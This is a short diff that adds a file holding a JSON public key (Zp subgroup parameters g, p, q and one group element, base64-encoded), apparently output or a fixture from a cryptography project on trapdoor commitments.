--- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/publicKey.out @@ -0,0 +1 @@ +{"publicKey":{"zpSubgroup":{"g":"Ag==","p":"AK+RIPEJgBcfry8YICwtmoutvw==","q":"V8iQeITAC4/Xl4wQFhbNRdbf"},"elements":["RDpx3om0j/3TQlNyKH9xgxKP"]}}